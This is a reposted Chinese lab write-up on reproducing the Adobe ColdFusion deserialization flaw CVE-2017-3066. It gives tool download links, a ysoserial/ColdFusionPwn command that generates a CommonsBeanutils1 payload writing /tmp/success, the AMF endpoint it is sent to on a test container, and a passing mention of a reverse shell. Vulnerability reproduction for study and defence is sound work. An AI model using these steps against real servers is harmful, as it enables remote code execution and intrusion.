ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

2021-03-01 14:33:33  阅读:405  来源: 互联网

标签:CVE Adobe ColdFusion ysoserial jar Amz SNAPSHOT 版本 序列化


影响版本

以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

工具地址

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

https://github-releases.githubusercontent.com/124920554/c78080be-261d-11e8-97f4-80ae25cc0cd9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210223%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210223T155244Z&X-Amz-Expires=300&X-Amz-Signature=4eec57835cfe0fde311cf3b35ed3a06ed5905960c4ea831b090e53d02d21ba0a&X-Amz-SignedHeaders=host&actor_id=77956516&key_id=0&repo_id=124920554&response-content-disposition=attachment%3B%20filename%3DColdFusionPwn-0.0.1-SNAPSHOT-all.jar&response-content-type=application%2Foctet-stream

使用工具

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-d367e379d9-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

POC生成于poc.ser文件中,将POC作为数据包body发送给http://192.168.49.2:8500/flex2gateway/amf,Content-Type为application/x-amf:

进入容器中,发现/tmp/success已成功创建

或者执行反弹命令

标签:CVE,Adobe,ColdFusion,ysoserial,jar,Amz,SNAPSHOT,版本,序列化
来源: https://www.cnblogs.com/bingtang123/p/14463420.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有